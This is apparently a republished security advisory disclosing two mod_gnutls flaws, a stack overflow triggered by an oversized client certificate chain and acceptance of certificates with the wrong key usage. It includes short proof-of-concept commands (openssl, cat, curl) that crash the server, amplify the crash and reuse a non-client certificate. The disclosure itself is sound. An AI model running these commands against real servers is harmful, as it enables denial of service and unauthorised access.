mod_gnutls Multiple Vulnerabilities

By
Editor Dataproof
-
0
5

mod_gnutls Multiple Vulnerabilities

Multiple vulnerabilities exist in mod_gnutls.

 

CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing 

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)

A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain – the same certificate can be used multiple times.

 

Proof of Concept: 

 

The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0.

 

1. The attacker generates a self-signed certificate:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj “/CN=self-signed-cert”

 

Please note there are no particular requirements for the contents of this certificate.

 

2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above:

cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain.pem

 

3. The attacker initiates an mTLS connection using the crafted certificate chain: 

curl https://<hostname> -k –key key.pem –cert malicious-cert-chain.pem

 

4. The following entry can be found in the /var/log/httpd/error_log file on the server:

*** stack smashing detected ***: terminated

[…] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd

 

The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening.

 

This attack can be easily amplified by the attacker by making a number of requests:

curl https://<hostname> https://<hostname> https://<hostname> https://<hostname> -k –key key.pem –cert malicious-cert-chain.pem

 

This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place.

 

CVE-2026-33308 Improper Certificate Validation

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8)

A client certificate with incorrect Extended Key Usage (EKU) is accepted. If the attackers compromise a certificate (with the associated private key) issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication.

 

Proof of Concept:

The attacker makes a HTTPS request using a separately acquired private key and certificate chain:

curl https://<hostname> -k –key key.pem –cert not-client-cert-chain.pem

Ben Smith
– Read more

RELATED ARTICLESMORE FROM AUTHOR